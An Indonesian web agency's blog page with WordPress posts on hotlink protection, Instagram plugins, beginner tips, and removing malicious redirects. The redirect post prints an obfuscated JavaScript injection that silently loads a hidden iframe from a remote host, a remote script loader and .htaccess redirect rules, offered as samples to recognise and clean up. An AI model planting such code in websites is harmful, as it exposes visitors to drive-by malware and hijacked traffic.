Page Referrer Baris kedua kita kosongkan supaya kita tidak memblokir gambar untuk pengunjung kita.

Sebuah komputer biasanya memiliki antivirus atau firewall yang menghapus page referrer dari web broser.

Baris ketiga kita isi dengan nama domain kita yang bersangkutan ( yang ingin kita proteksi). Jadi domain kita masih bisa mengakses gambar kita sendiri.

Baris Page referrer yang berisi nama domain seperti Google, Bing dan lainnya berguna supaya gambar kita tetap bisa didatangi mesin pencari.

Tambahkan baris ketujuh untuk link lain yang ingin Anda perlihatkan untuk web yang melakukan hotlink. Ini jika Anda menginginkannya.

Tambahkan juga sub domain cloudflare jika Anda juga sekaligus menggunakan Cloudflare (atau CDN lainnya).

Melindungi Hotlink Melalui Nginx

Bagi pengguna Nginx, silahkan Anda tambahkan code berikut:

location ~ .(gif|png|jpeg|jpg|svg)$ { 
   valid_referers none blocked ~.google. ~.bing. ~.yahoo. yourdomain.com *.yourdomain.com; 
   if ($invalid_referer) { return 403; 
  } 
}

Proteksi hotlink menggunakan Plugin keamanan wordpress

Plugin seperti All in One WP Security & Firewall memiliki fitur untuk perlindungan hotlink. Gunakan plugin ini untuk perlindungan lainnya diluar perlindungan hotlink.

Proteksi hotlink dengan mengganti nama

Jika hanya beberapa gambar yang terkena hotlink, silahkan Anda ubah saja namanya. Tetapi, jauh lebih praktis jika kita lengsung memproteksi banyak gambar sekaligus seperti cara – cara diatas.

Proteksi dari hotlink dengan seting Cpanel.

Cpanel memiliki fitur yang mampu melindungi wordpress kita dari hotlink.

Bagi yang memiliki gambar dengan hak cipta, gunakan “DMCA Takedown Notice”

Silahkan isi formulir DCMA takedown Notice dan kirimkan email ke website yang melakukan hotlink. Biasanya, mereka akan cepat melepaskan hotlink dari web / blog kita karena takut kita tuntut.

Sekian beberapa cara untuk melindingi gambar di blog dan website kita dari hotlink. Semoga bermanfaat.

5/5 (1)

Please rate this

Share this
18 May

Panduan Plugin Instagram WordPress Terbaik Bagi Anda

Memasukkan konten menarik dari Instagram ke website wordpress sebenarnya mudah. Kita bisa melakukannya secara otomatis dengan menggunakan berbagai plugin yang ada.

Plugin – plugin ini tersedia baik gratis ataupun berbayar. Jika menggunakan yang gratis, tentunya murah dan bisa jadi sudah sesuai dengan keperluan kita tanpa menambahkan apapun. Tetapi jika kita ingin fungsionalitas lebih, kita bisa menggunakan plugin berbayar.

Plugin berbayar memberikan fasilitas untuk memilih gambar dengan hastag tertentu. Kita bisa memilih gambar yang telah disukai orang tertentu dan juga dikirim dari tempat tertentu.

Fleksibilitas kita jauh lebih besar menggunakan plugin berbayar. Tetapi, baik gratis atau berbayar, kita bisa menggunakan plugin Instagram untuk memposting konten Instagram yang keren. Baik dari akun kita ataupun akun orang lain.

Instagram Feed

Plugin ini adalah salah satu yang paling populer dengan jumlah pengguna mencapai lebih dari 400 ribu pengguna. Fitur yang ada memungkinkan kita mengatur ukuran gambar dan juga berapa gambar yang ingin kita tampilkan dalam 1 hari. Selain itu, kita juga berkesempatan memposting gambar dari beberapa akun instagram sekaligus.

Feed Them Social Plugin

Plugin ini memudahkan kita untuk memposting apapun dari Instagram dan media sosial lain ke blog wordpress. Ya, kita bisa memposting foto dari media sosial lain apabila kita membutuhkannya.

Plugin ini memberikan banyak ikon media sosial yang bisa Anda tampilkan.

Enjoy Plugin for Instagram

Yang bagus dari plugin ini adalah kemampuannya mengatur hasil posting kita. Selain bisa tampil di post dan page, plugin ini menampilkan foto Instagram di widget jika kita memerlukannya.

Anda lebih bebas memilih menggunakan widget sidebar untuk menampilkan feed dari instagram.

Soal display, kita bisa memilih penampilan yang berbentuk grid ataupun carousel.

Gambar format grid adalah kumpulan gambar kotak – kotak kecil yang menampilkan banyak ganbar sekaligus.

Format carousel menampilkan beberapa gambar dalan 1 kotak saja.

Satu lagi adalah kemampuan menampilkan lightbox. Jadi, gambar bisa tampil dalam versi lebih besar dibandingkan yang tampil sebelumnya.

Dengan seting display yang berbeda, Anda lebih bebas menyesuaikan format display gambar dengan layout blog secara keseluruhan.

AccessPress Instagram Feed

Tersedia dalam opsi gratis dan premium. Versi gratis telah menyediakan tampilan dalam 3 pilihan. Tampilan dasar yang lebih mirip grid, tampilan slider dan mosaic.

Tampilan mosaic adalah tampilan banyak gambar sekaligus dengan ukuran tiap gambar yang berbeda.

Plugin ini juga bisa menambahkan fitur like dan follow supaya pengunjung juga bisa mengikuti media sosial kita.

Instagram Feed WD Plugin

Bagi Anda yang sekedar ingin mendisplay foto dalam lightbox atau thimbnail saja. Plugin ini sudah cukup dan praktis.

Anda yang fokus di aspek lain di website Anda bisa menggunakan plugin ini. Tampilannya cukup bagus dan tidak kalah dari plugin gratis lainnya.

Instagram Slider Widget

Sesuai namanya, plugin ini menampilkan slider feed Instagram di widget kita. Kita bisa menseting jadwal untuk melihat post berikutnya ( setingan dalam jam).

Plugin ini loadingnya cepat karena menyimpan thumbnails di dalam server wordpress kita.

DsgnWrks Instagram Importer

Bagi yang ingin memposting foto Instagram sebagai post atau custom post, ini plugin yang Anda butuhkan. Seting dan importnya mudah dilakukan dengan beberapa klik.

Intagrate Lite

Plugin ini memungkinkan kita menseting judul, isi text dan gambar terakhir secara manual. Ini mungkin penting bagi mereka yang ingin memberi judul berbeda untuk gambar yang sama di Instagram.

Gambar yang masuk dari IG bisa kita masukan di Library wordpress dan kita gunakan sebagai “featured image.”

Menseting plugin ini dilakukan di akun IG Anda. Yang bagus, plugin ini tidak menanyakan password dan nama login untuk mengakses akun Anda.

Menggunakan plugin memang memudahkan kita dalam mengelola wordpress. Plugin menyimpan program tambahan tadi diluar wordpress jadi program tambahan kita tidak akan hilang jika ada update di wordpress.

Bagi yang serius dengan posting IG di wordpress, silahkan untuk membayar versi premium yang memberikan lebih banyak fitur dan fasilitas untuk kita.

5/5 (1)

Please rate this

Share this
17 May

Tips WordPress Bagi Pemula

Menggunakan wordpress menyenangkan dan mudah. Meskipun begitu, ada beberapa tips yang bisa Anda gunakan saat memulai menggunakan WordPress.

Jangan takut salah

Salah dalam menggunakan wordpress tidak masalah. Jika Anda harus menghapus instalasi yang sudah jadi, tidak masalah. Ini supaya Anda lebih mengenal instal dan uninstal wordpress tanpa takut lagi.

Jangan salah memilih tema / theme website. Pilih yang meningkatkan merk Anda.

Tema yang sesuai membuat penampilan wordpress site Anda lebih menyenangkan. Silahkan gunakan theme yang cocok sesuai tujuan website.

Pilih theme yang cocok untuk smartphone

Saat ini tidak ada alasan menggunakan theme yang tidak cocok untuk smartphone. Hampir semua orang menggunakan smartphone. Theme lama Anda seharusnya sudah update dengan versi terbaru yang responsive untuk smartphone.

Gunakan panduan di wordpress yang banyak sekali itu

Semua panduan dasar wordpress kini tersedia. Dari cara instalasi hingga cara membuat theme. Jadi, apapun yang kita cari, kemungkinan besar sudah ada disana.

Panduan – panduan tersebut bisa sangat menghemat waktu Anda dalam membuat dan menseting blog / website wordpress Anda.

Fokus kepada keperluan dasar website Anda.

Saat sudah berjalan, kita mungkin ingin ini atau itu. Menggunakan plugin ini atau mengganti theme itu. Biasanya sih akhirnya kita tidak butuh yang kita inginkan.

Untuk plugin, instal saja yang paling kita perlukan seperti Yoast SEO plugin, Akismet serta Jetpack dari wordpress sendiri.

Selain itu Anda mungkin mempertimbangkan untuk menggunakan WP Super Cache atau plugin cache lain untuk wordpress.

Mempelajari dasar – dasar SEO (Search Engine Optimization).

Jika kita menginstal Yoast SEO plugin, kita bisa mencoba memenuhi penggunaan judul dengan kata kunci yang baik. Kata kunci ini kita ulang di paragraf pertama artikel kita.

Kita perlu belajar mengenai backlink. Gunakan backlink dengan “anchor text” yang sesuai kata kunci target kita. Misal jasa website untuk link ke website ini dan bukannya sekedar klik disini.

Gunakan “alt text” untuk gambar. Alt text ini akan dibaca menggantikan pembacaan gambar. Jadi untuk gambar ban jip di jalan berbatu, gunakan alt text semacam “ban offroad terbaik.”

Meta description. Ini bukan bagian dari SEO. Tetapi apabila website kita muncul di daftar pencarian Google atau Bing, meta description adalah keterangan dibawahnya. Buat keterangan ini menarik bagi pengunjung.

Buat daftar code yang sering digunakan.

Mengedit wordpress memang paling mudah dilakukan secara visual. Tetapi, terkadang kita perlu mengedit program yang ada. Menambah shortcode dan sebagainya. Silahkan simpan catatan code tersebut dan penggunaanya untuk digunakan lagi.

Catatan ini menghasilkan tampilan wordpress yang jauh lebih konsisten.

Backup situs Anda secara teratur.

Sangat penting membackup situs wordpress kita secara teratur. Server kita bisa rusak, hacker bisa menyerang dan sebagainya. Tanpa backup memadai, data situs kita bisa hilang jika ada masalah. Akibatnya, pekerjaan kita mesti diulang kembali.

Gunakan Yoast SEO plugin sebagai panduan tetapi jangan menjadi tujuan.

Memperoleh lampu hijau dari Yoast SEO memang menyenangkan. Beberapa orang bahkan menjadi paranoid apabila lampu tidak menjadi hijau.

Tetapi membuat semua lampu di posting kita hijau hanya akan membuat tulisan kita menjadi tidak masuk akal jika dibaca.

Yoast memang memandu kita untuk mengoptimasi tulisan kita. Tetapi, pembaca kitalah yang terpenting.

Selalu update wordpress kita. Ini penting karena update mengurangi kemungkinan website diserang hacker dan sebagainya. Uodate wordpress dan plugin yang Anda gunakan saat ada update terbaru. Jika Ada theme atau plugin yang menjadi tidak kompatibel saat update, sebaiknya diganti saja dengan yang lainnya.

Jika plugin ini penting dan hanya bisa bekerja dengan versi lama wordpress, gunakan plugin revert update wordpress seperti WP Rollback.

Jadikan security nomer satu.

Kita pasti ridak ingin ribet memperbaiki wordpress blog yang kena hack atau virus.

Gunakan plugin keamanan yang ada. Jetpack dari wordpress bagus tetapi ada lainnya yang terkenal yang bisa digunakan. Wordfence, Sucuri ataupun All in One WP Security an d Firewall.

Demikian tips dari kami untuk pengguna wordpress. Blog wordpress praktis tetapi menawarkan fleksibilitas dan stabilitas sistem yang tinggi.

Sampai jumpa…

5/5 (1)

Please rate this

Share this
17 May

Cara Menghilangkan Redirect Jahat (Malicious) dari Website WordPress Kita

Redirect adalah membelokkan trafik atau pengunjung kita ke website lainnya. Redirect jahat biasanya digunakan oleh mereka yang ingin iklan di websitenya mendapatkan impresi atau klik yang lebih banyak.

Masalahnya, redirect juga menciptakan celah keamanan yang bisa dimanfaatkan untuk menginstal malware atau software yang merusak komputer pengunjung website kita. Intinya, Redirect harus dihilangkan.

Untuk mencegahnya, kita bisa menggunakan plugin security. Jika Anda belum menggunakannya, sebaiknya Anda gunakan sekarang. Kami merekomendasikan plugin seperti Sucuri, Wordfence atau All in One WPSecurity and Firewall. Yang lainnya juga ada dan silahkan Anda coba sendiri.

Tetapi, ada kemungkinan Anda mencapai halaman ini setelah terkena masalah redirect ini. Jadi, inilah cara untuk menghilangkan redirect tersebut.

Yang harus Anda ingat, code redirect ini bisa masuk berkat program jahat lain yang sudah masuk duluan. Mungkin ada backdoor atau program uploader jahat lainnya.

Sekarang kembali ke redirect.

Sebelum mengubah file apapun di WordPress, selalu kita biasakan untuk membackup seluruh situs ke tempat yang aman.

Redirect dapat dimasukkan dimanapun, di file wordpress bahkan di database. Salah satu contoh code untuk redirect dalam bentuk Javascript:

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){returnd[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(newRegExp('\\b'+e(c)+'\\b','g'),k)}}returnp}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript> 

Scrip ini biasanya ditemukan di header.

Scrip seperti ini bisa ditemukan dalam script lain. Ia di-load atau dipanggil oleh script yang lainnya.

$.getScript('http://www.[redacted].com/script.js'function()

Langkah dasarnya,

Temukan file javascript yang melakukan redirect. Tidak semua javasriptc di WordPress kita adalah program jahat. Sebagian besar justru merupakan program inti WordPress.

Bagaimana menemukannya?

Yah, karena sudah terlanjur ditulis, kita lihat saja sekalian caranya (meski sebagian).

Menentukan sebuah script sebagai malicious atau tidak memang sulit, terutama bagi yang belum berpengalaman.

Caranya, buka: http://jsunpack.jeek.org

Disana, kita pastekan code milik kita. Jadi akan terlihat apakah code program tadi kode program jahat atau tidak.

http://jsunpack.jeek.org bisa digunakan untuk berbagai file seperti PDF, Javascript serta HTML.

Apabila javascript disamarkan, akan lebih sulit untuk dibaca code aslinya jika dilihat secara manual.

Sebenarnya, ada juga cara mengeceknya dengan browser kita. Semua program untuk internet, HTML, PHP dan Javascript dikenali browser kita sehingga bisa dieksekusi.

Sekarang, kita ganti script tadi di bagian “eval” menjadi “print.” Jadi, daripada mengeksekusi file tadi, browser kita akan memperlihatkan code programnya.

Ini berlaku juga untuk javascript yang sudah disamarkan.

Bagi Anda yang belum terbiasa, gunakan saja http://jsunpack.jeek.org.

2. Bagi pengguna Google Chrome, masukkan “view-source” dibelakang nama situs yang ingin kita cek. seperti ini: view-source:http://www.namasituskita.com. Kita bisa mengetahui bagian mana dari situs kita yang ada redirectnya.

View-source ini akan membagi code program dalam header, body, widget hingga footer. Script redirect tadi mungkin tampil di suatu bagian, entah body, widget atau footer.

Jika redirect ada di template wordpress kita, gunakan theme editor untuk menghapus script redirect tadi. Atau, kita download dulu , kita bersihkan dan upload kembali.

Redirect Javascript yang dimasukkan dalam page atau post.

Bisa untuk semua page dan semua post atau sebagian.

Javascrip redirectnya akan mirip code diatas.

Cara menghilangkannya harus dengan mengedit halaman post atau page bersangkutan satu persatu.

Atau, bisa kita edit melalui tool databse seperti PhpMyAdmin yang memungkinkan mengedit banyak post atau halaman sekaligus.

Javascript Redirect yang dipasang di Widget dan Htaccess.

Untuk javacsript yang dipasang di widget, ganti saja dengan widget baru. Yang lama dihapus saja.

Untuk Javascript yang dipasang di Htaccess, kita perlu download file htaccess yang ada, bersihkan dan upload kembali.

Contoh script redirect:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi

Htaccess bisa digunakan meredirect berdasar browser yang digunakan atau darimana pengunjung kita datang. Misal pengunjung dari Google diredirect ke web mereka.

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms

Cara membersihkannya, cek program disana dengan website tadi. Jika bersih berarti ok. Jika ada peringatan malicious, buang saja bagian tersebut.

Javascript Redirect dari iklan.

Beberapa iklan yang murah membiarkan atau tidak punya kemampuan menghindari redirect dari pengiklan mereka.Jika kita sulit mengetahui iklan mana yang menimbulkan masalah dan memblokirnya, buang saja iklan ( ad network ) tadi semuanya. Ganti saja dengan iklan lainnya.

5/5 (1)

Please rate this

Share this

© 2016 Lawang Techno Jasa Pembuatan Website. All rights reserved. Alamat: Jl. Waringin Sari, Kec. Depok, Kabupaten Sleman, Daerah Istimewa Yogyakarta 55281 Telepon:(0274) 2801204 Jam Kerja · 08.00–17.00